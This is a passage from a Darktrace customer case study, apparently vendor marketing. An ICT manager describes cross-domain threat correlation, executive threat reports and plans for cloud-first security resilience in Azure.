Darktrace has reduced manual triage by correlating activity across email, identity, network, and cloud, providing the context needed to prioritize what matters without requiring the ICT team to stitch together evidence across multiple tools.

“With unified visibility we can identify patterns across domains, make informed decisions about where risk actually exists, and align security actions with operational impact rather than theoretical threats,” explains the ICT Manager. “I can now prioritize effort and investment across our ICT landscape with far greater confidence.”

Regular Executive Threat Reports reinforce operational confidence by giving leadership clear visibility into threats Darktrace has handled autonomously, supporting decisive action when needed and confidence to avoid unnecessary disruption when it isn’t.

Scaling Securely in a Hybrid World

As the customer advances its cloud transformation, the ICT Manager sees the Darktrace partnership evolving into a foundational layer of resilience and assurance, supporting scale, governance, and operational confidence in an increasingly cloud-centric environment.

Key priorities include:

  • Shifting from hybrid visibility to cloud-first resilience, using continuous monitoring and posture insights to reduce exposure earlier
  • Strengthening governance and audit readiness, especially as critical workloads and sensitive data expand in Azure and expectations rise under regulatory and client assurance requirements
  • Increasing reliance on autonomous response and AI investigation as the number of identities, workloads, and access paths grows faster than headcount
  • Deepening cross-domain correlation so cloud signals further enrich decision-making, supporting faster containment and more confident prioritization

“As we accelerate our cloud strategy, Darktrace will play an even more strategic role,” says the ICT Manager, “providing the guidance, technology, and expertise that allow us to grow with confidence and innovate securely.”

Continue reading
About the author
Your data. Our AI.
Elevate your network security with Darktrace AI